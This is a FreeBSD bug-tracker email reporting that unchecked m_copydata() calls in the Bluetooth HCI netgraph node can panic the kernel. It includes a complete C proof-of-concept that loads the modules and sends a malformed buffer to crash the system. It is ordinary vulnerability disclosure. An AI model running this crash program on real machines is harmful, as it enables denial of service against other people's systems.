Date: Wed, 26 Oct 2022 21:28:58 +0000 From: bugzilla-noreply@freebsd.org To: bugs@FreeBSD.org Subject: [Bug 267294] inquiry_result() in ng_hci_event.c ought to check before calling m_copydata() Message-ID: <bug-267294-227-Wi0AO4kkhw@https.bugs.freebsd.org/bugzilla/> In-Reply-To: <bug-267294-227@https.bugs.freebsd.org/bugzilla/> References: <bug-267294-227@https.bugs.freebsd.org/bugzilla/>
next in thread | previous in thread | raw e-mail | index | archive | help
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D267294 --- Comment #1 from Robert Morris <rtm@lcs.mit.edu> --- The m_copydata() calls in num_compl_pkts() in ng_hci_evnt.c can also panic. Here's a demo program: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <netinet/in.h> #include <sys/wait.h> #include <sys/resource.h> #include <arpa/inet.h> #include <assert.h> #include <ctype.h> #include <fcntl.h> #include <signal.h> #include <netgraph/ng_message.h> #include <netgraph/ng_socket.h> #include <netgraph.h> int main(){ setlinebuf(stdout); struct rlimit r; r.rlim_cur =3D r.rlim_max =3D 0; setrlimit(RLIMIT_CORE, &r); signal(SIGPIPE, SIG_IGN); system("kldload netgraph"); system("kldload ng_hci"); int cs =3D -1; int ds =3D -1; NgMkSockNode(NULL, &cs, &ds); struct ngm_mkpeer mkp; memset(&mkp, 0, sizeof(mkp)); strcpy(mkp.type, "hci"); strcpy(mkp.ourhook, "hook"); strcpy(mkp.peerhook, "drv"); if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, NGM_MKPEER, &mkp, sizeof(mkp)) < 0) { fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhoo= k); } char buf[128]; memset(buf, 0xff, sizeof(buf)); *(long long *)(buf + 0) ^=3D 0xecfb; NgSendData(ds, "hook", (unsigned char *)buf, 116); } --=20 You are receiving this mail because: You are the assignee for the bug.=
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-267294-227-Wi0AO4kkhw>